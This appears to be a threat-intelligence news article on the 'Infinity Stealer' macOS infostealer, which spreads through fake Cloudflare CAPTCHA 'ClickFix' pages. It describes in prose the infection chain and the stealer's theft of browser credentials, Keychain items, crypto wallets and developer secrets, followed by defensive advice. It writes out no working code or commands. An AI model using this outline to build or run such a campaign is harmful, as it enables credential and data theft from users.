New Infinity Stealer: macOS Users Targeted by Sophisticated ClickFix "Cloudflare" CAPTCHA Lures
A sophisticated new malware campaign, dubbed Infinity Stealer, is actively targeting macOS users through a deceptive "ClickFix" social engineering tactic. By impersonating legitimate services like Cloudflare, attackers trick users into executing malicious code that harvests high-value data, including browser credentials, cryptocurrency wallets, and developer secrets.
The "ClickFix" Infection Vector
The attack begins when a user visits a compromised or malicious website. Instead of the expected content, they are presented with a fake Cloudflare CAPTCHA or a browser error message. The page instructs the user to "fix" the issue by clicking a button that copies a command to their clipboard and instructs them to paste and run it in the macOS Terminal.
This bypasses traditional browser security prompts by leveraging the user's own administrative trust. Once the command is executed, it downloads and launches the Infinity Stealer payload.
Technical Analysis of the Payload
Infinity Stealer is a Python-based malware, but it is notably compiled into a native macOS executable using the Nuitka compiler. This technique makes the code harder to reverse-engineer compared to standard Python scripts and allows it to run seamlessly on macOS environments without requiring a pre-installed Python interpreter.
Key Capabilities:
- Anti-Analysis: The malware performs checks for virtual machines and debugging environments to avoid detection by security researchers.
- Credential Harvesting: It targets Google Chrome, Safari, and Firefox to steal saved passwords, cookies, and autofill data.
- macOS Keychain Extraction: It attempts to access the system Keychain to retrieve sensitive certificates and account credentials.
- Crypto & Developer Theft: The stealer scans for cryptocurrency wallet extensions (MetaMask, Phantom) and searches for
.envfiles or.sshfolders to grab plaintext developer secrets and API keys.
Command and Control (C2) Infrastructure
The stolen data is bundled into a ZIP archive and exfiltrated to a remote server via HTTP POST requests. Simultaneously, the malware sends a notification to the attacker's Telegram bot, providing a real-time "hit" notification that includes the victim's IP address, system specifications, and a summary of stolen items.
Impact and Statistics
While the exact number of victims is evolving, the "ClickFix" methodology has seen a 40% increase in deployment across various malware families in early 2026 due to its high success rate against non-technical users.
| Feature | Details |
|---|---|
| Malware Type | Infostealer (Spyware) |
| Primary Target | macOS (Intel & Apple Silicon) |
| Programming Language | Python (Compiled via Nuitka) |
| Exfiltration Method | HTTP API & Telegram Bot API |
| Threat Level | Critical (High Data Sensitivity) |
How to Protect Your macOS Device
To defend against Infinity Stealer and similar "ClickFix" campaigns, security professionals recommend the following:
- Never Paste Commands: Legitimate services like Cloudflare or Google will never ask you to copy/paste code into your Terminal or PowerShell to solve a CAPTCHA.
- Use Managed Browser Policies: For organizations, disable the ability for users to access the Terminal or restrict execution of unsigned binaries.
- Deploy EDR: Utilize Endpoint Detection and Response (EDR) tools that can identify the execution of suspicious Python-compiled binaries.
- Audit Developer Secrets: Use secret-scanning tools to ensure API keys are not stored in plaintext in local directories.
Reference Links & Sources
